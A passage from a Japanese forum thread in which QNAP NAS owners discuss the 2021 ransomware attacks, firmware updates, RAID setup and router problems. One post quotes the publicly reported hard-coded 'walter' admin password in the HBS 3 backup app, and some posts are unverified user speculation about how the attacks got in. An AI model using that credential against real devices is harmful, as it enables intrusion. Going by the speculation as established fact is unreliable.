2021/04/29(木) 19:19:13.97ID:TgiI3/YW0 QNAPは最新ファームは様子見がデフォだと思ってたけど今回を機に自分も常に最新にしようと思った。
ファームの不具合食らったほうがマシだわ。
ファームの不具合食らったほうがマシだわ。
439不明なデバイスさん (ワッチョイ 0e10-dY4Y)
2021/04/29(木) 19:59:41.05ID:NCYFNDNf0 4ベイのnas(453d)を購入したのですが、raidについて相談です。
過去のスレで3ベイを使ってraid5、残り1をシングルで使っている方がいたのですが、
すべてraidにせず、例えば、raid1とシングル2などのほうが良いのでしょうか?
それとも、4ベイすべてを使用してraid5,raid10のほうがいいのでしょうか?
過去のスレで3ベイを使ってraid5、残り1をシングルで使っている方がいたのですが、
すべてraidにせず、例えば、raid1とシングル2などのほうが良いのでしょうか?
それとも、4ベイすべてを使用してraid5,raid10のほうがいいのでしょうか?
440不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 20:16:13.09ID:2TRnx8Ms0 RAID10がいいです
442不明なデバイスさん (スッップ Sd70-qRZI)
2021/04/29(木) 20:28:23.54ID:c2/A6Iq8d443不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 20:50:04.58ID:2TRnx8Ms0 "waltershao"、お前を忘れない。
444不明なデバイスさん (ワッチョイ ce48-b+U1)
2021/04/29(木) 21:02:51.50ID:+gNYIsXS0 まさか常に最新のQTSを追いかける日が来るとは...
445不明なデバイスさん (ワッチョイ 0e10-dY4Y)
2021/04/29(木) 21:06:56.44ID:NCYFNDNf0446不明なデバイスさん (ワッチョイ ae81-On6t)
2021/04/29(木) 21:14:13.34ID:cI3uWiZj0 4ベイすべて使ってRAID5だよ。それが当たり前だろ。
447不明なデバイスさん (ワッチョイ df10-Ojjt)
2021/04/29(木) 21:14:54.85ID:3fK/yvDT0448不明なデバイスさん (ワッチョイ ce48-b+U1)
2021/04/29(木) 21:18:04.25ID:+gNYIsXS0 俺はRaid5のrebuild失敗したことがあるので、Raid5なら4bayだろうからRaid10にする
449不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/29(木) 21:21:26.00ID:kgUH22Na0 用途、重視する点、環境、好み、気分、好奇心、出来心その他諸々で
管理者がどうしたいかを決めるもんじゃないのかな
管理者がどうしたいかを決めるもんじゃないのかな
450不明なデバイスさん (ワッチョイ 245f-Lw8H)
2021/04/29(木) 21:22:20.15ID:rBiQ2DXF0 自分の使い方で必要な容量と冗長性次第なんだから人に聞くことではないな
451不明なデバイスさん (ワッチョイ a402-IaMQ)
2021/04/29(木) 22:15:36.17ID:uHIHJPXF0 qufirewallのローカルネットワークのルールを間違って無効にして接続できなくなった
ネットワーク接続無しでfirewall無効にできないかな
機種は453beです
ネットワーク接続無しでfirewall無効にできないかな
機種は453beです
452不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 23:01:26.95ID:2TRnx8Ms0453不明なデバイスさん (ワッチョイ bf81-OedE)
2021/04/30(金) 00:17:17.82ID:LRgJGNDl0 >>439
あえて言うなら、サルベージはしない前提で考えるってこと。
RAIDでカバーできない障害があったとき、サルベージ業者を頼みたくなるかも
しれないが、そんなに大切なデータなら普段からバックアップを取っておけと。
だから、RAIDのタイプによってサルベージのしやすさが変わってくるが、それは考慮しない。
あえて言うなら、サルベージはしない前提で考えるってこと。
RAIDでカバーできない障害があったとき、サルベージ業者を頼みたくなるかも
しれないが、そんなに大切なデータなら普段からバックアップを取っておけと。
だから、RAIDのタイプによってサルベージのしやすさが変わってくるが、それは考慮しない。
454不明なデバイスさん (スッップ Sdff-G0PM)
2021/04/30(金) 00:40:23.15ID:ymhIBWW1d QNAPスレ初心者しかいねーのか
RAIDでサルベージどうの言いだしてるやんけ
RAIDでサルベージどうの言いだしてるやんけ
455不明なデバイスさん (ワッチョイ c763-A1uN)
2021/04/30(金) 01:03:07.04ID:3+2OljaT0 TS-128のワイ、低みの見物
NASのデータが重要度が一番低いバックアップだからどんな攻撃にも無敵でワロタ
NASのデータが重要度が一番低いバックアップだからどんな攻撃にも無敵でワロタ
456不明なデバイスさん (ワッチョイ 6736-TQtH)
2021/04/30(金) 01:12:42.59ID:Ta6xQprN0 QTS 5.0.
457不明なデバイスさん (ワッチョイ 6736-TQtH)
2021/04/30(金) 01:14:26.46ID:Ta6xQprN0 RAIDでサルベージはちょうどホットな話題だからね。
458不明なデバイスさん (ワッチョイ 273d-uiaF)
2021/04/30(金) 02:15:25.07ID:YwDN0VGP0 RAIDレベルの設計を考えるときはRTOとRPOの違いを調べた上で自分だったらどっちをどれくらい譲れるか考えると良いよ。
どっちも違うものなのに似たようなところがあるからそれを同時に天秤にかけようとして難しくなる。
自分はRAID1とシングル1本でシングルは週次でバックアップしてる。
と言ってもメインは一眼レフの画像だからSDとPCとRAIDとシングルとで四重持ちになっちゃってるのはもったいない感じするけど。
どっちも違うものなのに似たようなところがあるからそれを同時に天秤にかけようとして難しくなる。
自分はRAID1とシングル1本でシングルは週次でバックアップしてる。
と言ってもメインは一眼レフの画像だからSDとPCとRAIDとシングルとで四重持ちになっちゃってるのはもったいない感じするけど。
459不明なデバイスさん (ワッチョイ c707-Q+lb)
2021/04/30(金) 07:50:42.79ID:boYX3aF30 >>451
多分以下の方法でイけると思うんだけど、OS起動からアプリ起動まで数分のタイムラグがあるからその間にアプリを削除する
NASを再起動→ビープ音2回→QTSで認識されるまで待つ(数分かかる)→認識されたらNASに接続(接続できるまで1-2分かかる)→即アプリ削除
コレでqufirewallじゃないけど設定ミスってQTSに認識されないのを何回も復旧できたよ
多分以下の方法でイけると思うんだけど、OS起動からアプリ起動まで数分のタイムラグがあるからその間にアプリを削除する
NASを再起動→ビープ音2回→QTSで認識されるまで待つ(数分かかる)→認識されたらNASに接続(接続できるまで1-2分かかる)→即アプリ削除
コレでqufirewallじゃないけど設定ミスってQTSに認識されないのを何回も復旧できたよ
460不明なデバイスさん (ワッチョイ 8768-7W5u)
2021/04/30(金) 08:20:26.20ID:r9CbEekB0 iPhoneの新しくなったQfileアプリってどーやってログアウトすれば良いの?
461不明なデバイスさん (ワッチョイ 273d-uiaF)
2021/04/30(金) 09:14:17.06ID:YwDN0VGP0 ランサムの被害はなかったんだけど連休ということもあってちょうど自宅の環境を見直し始めたらbuffaloのルータのファームウェア更新が来てたわ。
外部接続はVPN使ってたことと機種が古くてHBS3に対応してなかったことで助かった。
外部接続はVPN使ってたことと機種が古くてHBS3に対応してなかったことで助かった。
462不明なデバイスさん (ワッチョイ e7f3-UsW0)
2021/04/30(金) 09:35:35.20ID:g4ruMCso0 HackerNewsに乗ってたよ。
HBS 3 Hybrid Backup Sync 16.0.0419は、
> "pwd_plain": "walter"
> "admin_pwd": "walter"
というパスワードがプログラムコード内に直接コーディングされてるって。
で、なぜwalterなのかというと、Walterとは恐らく
QNAP Technical ManagerのWalter Shaoのことだろうって
多分、開発中にハードコードしていたパスワードを公開する際に
消すのを忘れたんじゃないかな
HBS 3 Hybrid Backup Sync 16.0.0419は、
> "pwd_plain": "walter"
> "admin_pwd": "walter"
というパスワードがプログラムコード内に直接コーディングされてるって。
で、なぜwalterなのかというと、Walterとは恐らく
QNAP Technical ManagerのWalter Shaoのことだろうって
多分、開発中にハードコードしていたパスワードを公開する際に
消すのを忘れたんじゃないかな
463不明なデバイスさん (ワッチョイ ff02-JFo9)
2021/04/30(金) 10:21:19.18ID:btjyL5qH0 >>452
ありがとうそれで行けました。
QuFirewallというアプリの問題だからネットワークのリセットでは駄目かと思いこんでた。
考えてみたらアプリは単なるUIだから試せばよかった。
サポートに問い合わせて一週間近く応答なかったからここで聞いたんだけど、その直後にサポートから同じ回答来てた。
今日本語の対応時間かかるから英語でよろしく、だって。
ありがとうそれで行けました。
QuFirewallというアプリの問題だからネットワークのリセットでは駄目かと思いこんでた。
考えてみたらアプリは単なるUIだから試せばよかった。
サポートに問い合わせて一週間近く応答なかったからここで聞いたんだけど、その直後にサポートから同じ回答来てた。
今日本語の対応時間かかるから英語でよろしく、だって。
464不明なデバイスさん (ワッチョイ ff02-JFo9)
2021/04/30(金) 10:26:20.74ID:btjyL5qH0465不明なデバイスさん (ワッチョイ 7f6e-Sucn)
2021/04/30(金) 11:22:14.30ID:MbXj7GZ30 >>461
ちょうどBaffalo無線ルーターも権限昇格とかのセキュリティホール見つかってたからな
ちょうどBaffalo無線ルーターも権限昇格とかのセキュリティホール見つかってたからな
467不明なデバイスさん (ササクッテロ Sp5b-Cy9j)
2021/04/30(金) 13:57:33.34ID:w2iWLj7vp scott/tigerみたいなものか
468不明なデバイスさん (スプッッ Sd7f-xgst)
2021/04/30(金) 15:10:02.96ID:x1ETTySMd qufirewallってdownloadstationとかtransmissionで海外からダウンロードしてるファイルとかも弾いちゃう?
469不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/04/30(金) 15:27:35.31ID:Ta6xQprN0470不明なデバイスさん (スプッッ Sd7f-xgst)
2021/04/30(金) 15:35:47.79ID:uUe43yEdd471不明なデバイスさん (ワッチョイ 5f68-sY7A)
2021/04/30(金) 15:35:59.05ID:7P4Cc5oX0 woooのivdrに録画したデータを退避したくてqnap nasを物色しているのですが、
alexonとか他社のnasをqnap化した機体でも、
対象機種化であればsmedio dtcp moveは導入できるのでしょうか?
smedioは有料っぽいんですが課金方法が調べても分からず、
シリアル番号管理の課金だと無理かもなあとか考えています
alexonとか他社のnasをqnap化した機体でも、
対象機種化であればsmedio dtcp moveは導入できるのでしょうか?
smedioは有料っぽいんですが課金方法が調べても分からず、
シリアル番号管理の課金だと無理かもなあとか考えています
472不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/04/30(金) 15:46:18.93ID:Ta6xQprN0 >>470
使うポートを除外すれば大丈夫だよ、相手先も国別で指定できるし
使うポートを除外すれば大丈夫だよ、相手先も国別で指定できるし
473不明なデバイスさん (ワッチョイ ff02-JFo9)
2021/04/30(金) 16:54:45.71ID:btjyL5qH0474不明なデバイスさん (ワッチョイ df7c-ki6C)
2021/04/30(金) 16:56:50.58ID:Ezm0sjPF0475不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/04/30(金) 17:26:35.42ID:Ta6xQprN0476不明なデバイスさん (アウアウエー Sa9f-+ejU)
2021/04/30(金) 18:40:31.13ID:EFGpE9Bza477不明なデバイスさん (ワッチョイ a75f-MJGp)
2021/04/30(金) 19:13:04.13ID:7Yll+fqa0 間抜けなウォルターにワロター
478不明なデバイスさん (オッペケ Sr5b-QuVS)
2021/04/30(金) 19:48:38.71ID:b9UE9O0Tr walterあなた疲れてるのよ
479不明なデバイスさん (ワッチョイ e7f3-UsW0)
2021/04/30(金) 20:11:13.47ID:g4ruMCso0 HBS 3 Hybrid Backup Sync 16.0.0419の中には
Walter ShaoのメールIDもハードコードされてるってさ
しかも2つ
この調子だとQNAPのソースコード流出とか、
QNAPの会社のサーバーがランサムウェアに犯されるという可能性もあるかと
Walter ShaoのメールIDもハードコードされてるってさ
しかも2つ
この調子だとQNAPのソースコード流出とか、
QNAPの会社のサーバーがランサムウェアに犯されるという可能性もあるかと
480不明なデバイスさん (ワッチョイ 0754-OedE)
2021/04/30(金) 23:27:40.24ID:YnQCy4LT0 いつかランサム入りのファームウェアが配布されそうだな
481不明なデバイスさん (ワッチョイ 075f-s/Ji)
2021/05/01(土) 01:56:09.32ID:2zKWFG1I0 とりあえずファーム上げてアプリも最新バージョンにしとけばひとまず安心して良いんだよな?
482不明なデバイスさん (ワッチョイ e72d-KhJC)
2021/05/01(土) 02:11:56.10ID:+Kn+7YAj0 TS-220だとHBS2しかインストールできないから、このマルウェアに関しては被害を受ける事はなかったのかな
483不明なデバイスさん (ワッチョイ 7fbb-yV6G)
2021/05/01(土) 09:17:34.81ID:MzHMzY3A0 QNAP製NASへのランサムウェア攻撃は公式バックアップソフトにハードコードされたパスワードが原因か
https://gigazine.net/news/20210430-qnap-ransomware-hard-coded-password/
https://gigazine.net/news/20210430-qnap-ransomware-hard-coded-password/
484不明なデバイスさん (ワッチョイ a75f-A/rE)
2021/05/01(土) 09:40:37.31ID:U/oJ3HuB0 ファーム上げたけどAdvanced Network Driverのインストールに失敗したようでQNAPのサイトからqpkg落として手動でインストールしたんだけど上手く動作してない
DNSサーバーに繋がらないみたいで各種サービスがうまく動いてない
これ、うちだけの不具合かな?
DNSサーバーに繋がらないみたいで各種サービスがうまく動いてない
これ、うちだけの不具合かな?
485不明なデバイスさん (ワッチョイ e714-n+qf)
2021/05/01(土) 11:16:07.16ID:RThO14Pn0 色々アップデートしたらqumagieが立ち上がらなくなったからここで訊こうかと思ったけど再起動したら治ったわ
486不明なデバイスさん (ワッチョイ 7f9b-x34T)
2021/05/01(土) 11:16:52.75ID:j11mhy8X0 ただのファイルサーバーとしか使ってなかったからファームウェアのアプデついでに初期化したんだけどさ
パスワードの最小文字数変わった?
Windowsのローカルアカウントと同じにしてたから微妙に不便…
パスワードの最小文字数変わった?
Windowsのローカルアカウントと同じにしてたから微妙に不便…
487不明なデバイスさん (ワッチョイ 7fba-VnWD)
2021/05/01(土) 12:07:32.63ID:TnrOjpKk0 外部バックアップしてて助かった。
っていっても先週のデータまでだけど。
っていっても先週のデータまでだけど。
488不明なデバイスさん (ブーイモ MMcb-AH5W)
2021/05/01(土) 12:27:51.45ID:QuvU29d9M 今回のQNAPの不祥事は、多機能さや便利さを追求し続ける事の難しさを露呈したな
489不明なデバイスさん (アウアウカー Sa3b-PU2s)
2021/05/01(土) 12:43:35.29ID:nTyV8jtva そんな高尚な話じゃないだろ…
490不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/01(土) 12:46:33.14ID:YwrgFovq0 じゃないね…
491不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/01(土) 12:50:07.48ID:YwrgFovq0 >>481
Malware RemoverとSecurity Counselorのインストール
Malware RemoverとSecurity Counselorのインストール
492不明なデバイスさん (ワッチョイ 0766-DFSD)
2021/05/01(土) 13:00:40.25ID:266Q4vKo0495不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/01(土) 13:53:14.26ID:YwrgFovq0 AgeLocker Ransomware
https://www.qnap.com/ja-jp/security-advisory/qsa-21-15
https://www.qnap.com/ja-jp/security-advisory/qsa-21-15
496不明なデバイスさん (ワッチョイ bf02-OC3W)
2021/05/01(土) 14:35:55.80ID:epV7ClWN0 ランサムにやられちまっただよ4/24に
中途半端に2割くらい書き換えられた
その2週間くらい前にバックアップ取ってたから全部復帰できたけどどうやって侵入されたんだろ
中途半端に2割くらい書き換えられた
その2週間くらい前にバックアップ取ってたから全部復帰できたけどどうやって侵入されたんだろ
497不明なデバイスさん (ワッチョイ 27ca-TNk6)
2021/05/01(土) 15:19:22.94ID:iX7CJTgW0498不明なデバイスさん (ワッチョイ dfb1-/1qA)
2021/05/01(土) 17:39:11.68ID:NZEgg79c0 BIOSですらロクなチェックしてないからね。
高負荷テストとかやってない。
高負荷テストとかやってない。
499不明なデバイスさん (ワッチョイ 2702-TNk6)
2021/05/01(土) 19:04:46.42ID:mr5nh3bF0 QLOCKERの被害にあいました。初心者です。
いろいろな書き込みを見てやってみたのですが、7z.logファイルは見つからないので、
復元は諦めて被害にあったフォルダはクラウドに取っておいたバックアップから戻そうと思っています。
HBS3はファームウェアが古いからだと思うのですが、更新ができなかったので削除しました。
ファームウェアの更新をしてから、最新のHBS3を入れて、被害にあったフォルダを作り直してファイルをクラウドからコピーしようと思うのですが、サポートからの返信がまだなく、再起動を避けるためファームウェアの更新がまだできていません。
このままサポートからの返信を待つべきなのか、返信があったとしてもおそらくダメなのでファームウェアの更新をするか迷っています。
どなたかご助言いただけると嬉しいです。
いろいろな書き込みを見てやってみたのですが、7z.logファイルは見つからないので、
復元は諦めて被害にあったフォルダはクラウドに取っておいたバックアップから戻そうと思っています。
HBS3はファームウェアが古いからだと思うのですが、更新ができなかったので削除しました。
ファームウェアの更新をしてから、最新のHBS3を入れて、被害にあったフォルダを作り直してファイルをクラウドからコピーしようと思うのですが、サポートからの返信がまだなく、再起動を避けるためファームウェアの更新がまだできていません。
このままサポートからの返信を待つべきなのか、返信があったとしてもおそらくダメなのでファームウェアの更新をするか迷っています。
どなたかご助言いただけると嬉しいです。
500不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/01(土) 19:16:28.17ID:YwrgFovq0 直ぐ使う必要がないのなら準備だけしてそのまま待てば?HBS3もまだ怪しいし。
501不明なデバイスさん (スップ Sd7f-hk6V)
2021/05/02(日) 00:44:19.37ID:/AlaupGTd やっぱりQNAPは上級者向きだわ
ダサいバグ残してたために
ランサムとかとても怖くて初心者にはムリ
ダサいバグ残してたために
ランサムとかとても怖くて初心者にはムリ
502不明なデバイスさん (ワッチョイ bf5f-GlCi)
2021/05/02(日) 06:44:29.17ID:/bwQOY7Q0 ここ最近連発してるしその手の輩から目を付けられ易いハードと言う事は再認識された。
ある意味鍛えられてトレーニング向けかもしれない。
ある意味鍛えられてトレーニング向けかもしれない。
503不明なデバイスさん (ワッチョイ 67f1-OedE)
2021/05/02(日) 08:46:47.72ID:u370uax50 Videostationは終了なんかな?
CAYINとかいうのを入れろと言われるし、
フォルダ監視のトランスコードも動かなくなってる。
CAYINとかいうのを入れろと言われるし、
フォルダ監視のトランスコードも動かなくなってる。
504不明なデバイスさん (ワッチョイ 67f1-OedE)
2021/05/02(日) 09:10:55.45ID:u370uax50 すまない。
VIdeostationの件はQTS451からの仕様なのね。既出失礼しました。
フォルダ監視の件はCAIYNインストール前からあったトランスコード前のファイルは
CAYINのフォルダ監視には追加ファイルとして受け取られないってことのよう。
実際にプレイヤーとしては使ってないからどうでもいいんだけど、
CAIYNのプレイヤーアプリとしてのダメさはVideostation以上だね。
PCの動画プレイヤーみたいなのはないんだろうか。
Webでストリーミングさせてる以上はある程度仕方ないのはわかるんだけど、
それでもひどいと感じる
VIdeostationの件はQTS451からの仕様なのね。既出失礼しました。
フォルダ監視の件はCAIYNインストール前からあったトランスコード前のファイルは
CAYINのフォルダ監視には追加ファイルとして受け取られないってことのよう。
実際にプレイヤーとしては使ってないからどうでもいいんだけど、
CAIYNのプレイヤーアプリとしてのダメさはVideostation以上だね。
PCの動画プレイヤーみたいなのはないんだろうか。
Webでストリーミングさせてる以上はある程度仕方ないのはわかるんだけど、
それでもひどいと感じる
505不明なデバイスさん (ワッチョイ 87b2-OedE)
2021/05/02(日) 09:40:07.74ID:h3IZEEb60 UI見ただけで汚くて使いたくなくなるからな 使い勝手も悪いし
トランスコードのためと割り切るしかない
トランスコードのためと割り切るしかない
506不明なデバイスさん (ワッチョイ 2788-BDeo)
2021/05/02(日) 10:36:24.32ID:QT/P88so0 firewallの拒否したパケット、どのポートから入ってきたとか詳細って見れないの?
気になるんだけど
気になるんだけど
507不明なデバイスさん (ワッチョイ 6736-TQtH)
2021/05/02(日) 10:46:25.22ID:1EW1xsym0 キャプチャしないとわからないよね。直近、1000パケットとか記録してくれたらいいのに。
508不明なデバイスさん (ワッチョイ 87bb-OedE)
2021/05/02(日) 11:29:12.70ID:yg7af+pN0 中韓からいっぱい来てるなーで終わるとは思うで
509不明なデバイスさん (ワッチョイ dfad-mIzA)
2021/05/02(日) 11:57:49.94ID:ESy9mDo/0 ルータレベルだとここ数日はtcpの23,6379,22,80,443辺りが人気
3-4月半ばは群を抜いて123/udpが人気だったんだけど移り変わるもんらしい
3-4月半ばは群を抜いて123/udpが人気だったんだけど移り変わるもんらしい
510不明なデバイスさん (ワッチョイ a75f-OedE)
2021/05/02(日) 12:10:49.31ID:KCptvMyt0 V6プラス使ってると普通使えるポート全部死んでるからポート狙われるときは安全
意外と使えないサービスあって泣けてくるけど
まさかfusion360が使えないとは思わなかったわ
意外と使えないサービスあって泣けてくるけど
まさかfusion360が使えないとは思わなかったわ
511不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/02(日) 12:19:28.36ID:1EW1xsym0 デフォルトから変更できるポートは変更した方がいいね
512不明なデバイスさん (ワッチョイ 7fba-VnWD)
2021/05/02(日) 12:29:41.35ID:KDtx5Qja0 adminも切ってる、UPnPもOFF。
8080も他ポートへ変更済み。
にも関わらずランサムウェアに感染。
これHBS3のハードコードで間違いなさそうやね。
8080も他ポートへ変更済み。
にも関わらずランサムウェアに感染。
これHBS3のハードコードで間違いなさそうやね。
513不明なデバイスさん (ワッチョイ dff0-Irxz)
2021/05/02(日) 13:45:53.64ID:vODB9BqF0 myQNAPcloud使ってて8台登録
その中でやられたのが1台(ts253Pro)
253の中でもadminでのアクセス権限がない領域だけやられた。
そしてそのQNAPのルーターだけIPv6がオンになってた。(ルーターはNUROのF660)
それとになるのがやられている最中だと思うが夜の2時くらいに外部から253に接続できないので会社に行ったらNUROのルーターが2台とも点滅して使えない状態だった。
そしてts253Proがぶら下がってるルーター以外にもQNAPば接続してるけどそっちはやられていない。
それとバックアップの同期で暗号化されたファイルで置き換わっていたので結構めんどくさい。
みんなの参考になれば
その中でやられたのが1台(ts253Pro)
253の中でもadminでのアクセス権限がない領域だけやられた。
そしてそのQNAPのルーターだけIPv6がオンになってた。(ルーターはNUROのF660)
それとになるのがやられている最中だと思うが夜の2時くらいに外部から253に接続できないので会社に行ったらNUROのルーターが2台とも点滅して使えない状態だった。
そしてts253Proがぶら下がってるルーター以外にもQNAPば接続してるけどそっちはやられていない。
それとバックアップの同期で暗号化されたファイルで置き換わっていたので結構めんどくさい。
みんなの参考になれば
514不明なデバイスさん (ワッチョイ c705-UsW0)
2021/05/02(日) 13:57:08.18ID:M1C065yl0 正直すげー参考になる
515不明なデバイスさん (ワッチョイ dff0-Irxz)
2021/05/02(日) 14:55:15.00ID:vODB9BqF0 HSB3が15.1以降にアプデできないのがある
ファームはQTS4.4.3
最新の4.5.3入れる勇気はないなぁ
ファームはQTS4.4.3
最新の4.5.3入れる勇気はないなぁ
516不明なデバイスさん (ワッチョイ 6790-p7vY)
2021/05/02(日) 17:38:38.83ID:FFPMMSeq0 ハードコーディングされていたのはHBS 3のバージョン16.0.0419だけだったのかな
それとも以前のバージョンからずっと含まれていたのだろうか
それとも以前のバージョンからずっと含まれていたのだろうか
517不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/02(日) 20:18:28.35ID:1EW1xsym0 tcpdumpを入れてみたけど毎秒ごとに個人情報がネットに送られているような感じだな
518不明なデバイスさん (ワッチョイ dfca-CN4i)
2021/05/02(日) 20:35:30.30ID:78jdwCPU0519不明なデバイスさん (ワッチョイ dfb1-/1qA)
2021/05/02(日) 22:06:11.90ID:XqHTfLT90 糞仕様さすが上級者向けだな。
520不明なデバイスさん (ブーイモ MMcf-hiJl)
2021/05/02(日) 22:13:55.48ID:TWJITa97M 512のケースはインターネットから到達可能でポートスキャンでやられたのかしら?
また、513のケースはIPv6のパブリックIPだから到達出来たという事なのかしらね。
とにかく到達出来てしまえばハードコードされたID/パスでログインされてしまうように見えるね。
また、513のケースはIPv6のパブリックIPだから到達出来たという事なのかしらね。
とにかく到達出来てしまえばハードコードされたID/パスでログインされてしまうように見えるね。
521不明なデバイスさん (ドコグロ MM4f-2rzS)
2021/05/02(日) 22:35:10.19ID:UhHXUEGeM 上級者というより、グローバル企業は元々個人情報保護の概念が希薄って印象を受ける
522不明なデバイスさん (ワッチョイ ff02-JFo9)
2021/05/02(日) 22:40:07.66ID:Zm6GDhHM0 結局QNAPCloud使ってなきゃ関係ないのかな
523不明なデバイスさん (アウアウウー Saab-k4vL)
2021/05/02(日) 22:45:45.00ID:45ofm2aKa >>512
それでもやられるのか。参考になりました。ありがとう。
それでもやられるのか。参考になりました。ありがとう。
524不明なデバイスさん (ワッチョイ df05-YF1U)
2021/05/02(日) 23:10:37.68ID:Ldb0oSOV0 今のところ被害がないけど、セキュリティ/許可・拒否リストで
「リストからの接続だけを許可する」を選択して、リストには
ローカルなデバイスのIPだけを書いているから?
「リストからの接続だけを許可する」を選択して、リストには
ローカルなデバイスのIPだけを書いているから?
525不明なデバイスさん (ワッチョイ a75f-FYM5)
2021/05/02(日) 23:48:42.37ID:W/RtBBAT0 こんな中、別件で申し訳ないがv6プラスの人教えて!
ドコモ光のGMOで契約してまして、ルーターをバッファロー製の新しいものに更新したらipv4だけが死んでipv6のみになり、IODATAのルーターにしたら頻繁に途切れて、elecomのルーターにしたら同様に途切れて、今現在NECのルーターにしたら何故か調子いいです。
調子が悪かった3つは全てNASの電源を落としていたら問題なく通信できていて、NASが起動すると不具合が発生します。
なお、pppoeに戻したらクソ回線ですが通信はうまくいきます。
v6プラスの方で同じ現象経験したことある方いますか?また対策等ありますか?
ドコモ光のGMOで契約してまして、ルーターをバッファロー製の新しいものに更新したらipv4だけが死んでipv6のみになり、IODATAのルーターにしたら頻繁に途切れて、elecomのルーターにしたら同様に途切れて、今現在NECのルーターにしたら何故か調子いいです。
調子が悪かった3つは全てNASの電源を落としていたら問題なく通信できていて、NASが起動すると不具合が発生します。
なお、pppoeに戻したらクソ回線ですが通信はうまくいきます。
v6プラスの方で同じ現象経験したことある方いますか?また対策等ありますか?
526不明なデバイスさん (ワッチョイ 7f68-OedE)
2021/05/02(日) 23:50:29.89ID:OHyBaiAi0 TS-473A、販売元Amazonで出てますね。
\125.720
納期1〜2か月
\125.720
納期1〜2か月
528不明なデバイスさん (ワッチョイ c707-Q+lb)
2021/05/03(月) 00:07:15.58ID:hwsw2zij0 もうGMO、牛、イオってだけで拒否反応出る
529不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/03(月) 00:58:07.47ID:kl78OZMK0530不明なデバイスさん (ワッチョイ df8e-MiMN)
2021/05/03(月) 02:57:38.13ID:Y8WOB8gI0 >>525
馬鹿はNASを使うな
馬鹿はNASを使うな
531不明なデバイスさん (ワッチョイ a75f-Sucn)
2021/05/03(月) 04:02:46.17ID:x6RrCkTG0 >>525
IPv6プラス契約してて一部のサイトしか見られないなら、IPv6プラスじゃなくIPv6のみの接続になってる
メーカーにもよるが、PPPoEの設定消した上でIPv6プラスの接続設定してやらないとIPv6プラスでの接続にならない
ヤマハのルータではIPv6プラスとIPv4(PPPoE)の両方で接続できたりもするが、それができるのはヤマハなど一部のメーカーのルータだけ
外部からのアクセスが上手くいかないって話なら、IPv6プラスだとIPv4接続のときのポートが使えないからルータでIPv4と同じ設定のポートフォワードしても外部からQNAPには接続できない
デフォルトポートから変更不可なサービス以外はIPv6プラス用の設定をちゃんとやってやれば使える
設定の仕方は検索すればわかる
IPv6プラス契約してて一部のサイトしか見られないなら、IPv6プラスじゃなくIPv6のみの接続になってる
メーカーにもよるが、PPPoEの設定消した上でIPv6プラスの接続設定してやらないとIPv6プラスでの接続にならない
ヤマハのルータではIPv6プラスとIPv4(PPPoE)の両方で接続できたりもするが、それができるのはヤマハなど一部のメーカーのルータだけ
外部からのアクセスが上手くいかないって話なら、IPv6プラスだとIPv4接続のときのポートが使えないからルータでIPv4と同じ設定のポートフォワードしても外部からQNAPには接続できない
デフォルトポートから変更不可なサービス以外はIPv6プラス用の設定をちゃんとやってやれば使える
設定の仕方は検索すればわかる
532不明なデバイスさん (ワッチョイ a75f-FYM5)
2021/05/03(月) 07:06:29.59ID:BQO+uojO0 >>531
ありがとう
外部からの接続的なことで言えば、割り当てポート指定してopen VPNで出来てます。
プロバイダに確認したらちゃんとv6プラス接続自体はできてて、実際pppoeの設定も入れてないが何故かipv6サイトは見れて他は見れない。
Buffaloの技術部門の人がラボにqnap実機持ってて検証してくれて、この状態が再現できたがまだ原因が分からないとのこと。
もちろん、DHCP含め設定見直したが好転せず。
あたりつけたいので同じ状況の方いらっしゃったらと思って
ありがとう
外部からの接続的なことで言えば、割り当てポート指定してopen VPNで出来てます。
プロバイダに確認したらちゃんとv6プラス接続自体はできてて、実際pppoeの設定も入れてないが何故かipv6サイトは見れて他は見れない。
Buffaloの技術部門の人がラボにqnap実機持ってて検証してくれて、この状態が再現できたがまだ原因が分からないとのこと。
もちろん、DHCP含め設定見直したが好転せず。
あたりつけたいので同じ状況の方いらっしゃったらと思って
533不明なデバイスさん (ワッチョイ df7c-Irxz)
2021/05/03(月) 09:06:03.99ID:9tYAth9+0 >>520
513です。レスありがとう。
ほかにもウチのファッションビルに入ってる店も攻撃されてた。(マルウェアリムーバーが防いでた)
そこはNTTとの個別契約だけど館内のVDSL接続なのでIPv6だけが原因じゃないね。
あとIPv6閉じてたQNAPも死にかけててシステムにログインできない感じなので原因ははっきりしない。
513です。レスありがとう。
ほかにもウチのファッションビルに入ってる店も攻撃されてた。(マルウェアリムーバーが防いでた)
そこはNTTとの個別契約だけど館内のVDSL接続なのでIPv6だけが原因じゃないね。
あとIPv6閉じてたQNAPも死にかけててシステムにログインできない感じなので原因ははっきりしない。
535不明なデバイスさん (ブーイモ MMcf-VnWD)
2021/05/03(月) 10:01:04.71ID:LD725qlgM これバックドア仕込まれてたんじゃないの?
Malware Removerが127.0.0.1 MR2102消した。
とログにあったけど、どうやって入った来たんだ?
Malware Removerが127.0.0.1 MR2102消した。
とログにあったけど、どうやって入った来たんだ?
536不明なデバイスさん (ワッチョイ 67f5-Pk3V)
2021/05/03(月) 10:10:35.73ID:CT1KrV500 症状としてはMAP-Eの変換が上手くいってないんだろな。
ひかり電話用のHGWとかかりてそっちでMAP-Eの変換させればええやん
ひかり電話用のHGWとかかりてそっちでMAP-Eの変換させればええやん
537不明なデバイスさん (JP 0Hbf-MVWC)
2021/05/03(月) 10:51:16.21ID:lZ/yaGxPH PHPの脆弱性が狙われたんじゃないかって言ってた人いたな
538不明なデバイスさん (ワッチョイ bf02-OC3W)
2021/05/03(月) 11:04:34.03ID:lyEr1P1V0 今回ランサムにやられてはじめてこのスレに来たけどもっと早くから見ておけばよかったな
ある意味多機能すぎるんだな
ある意味多機能すぎるんだな
540不明なデバイスさん (ブーイモ MMcb-TQtH)
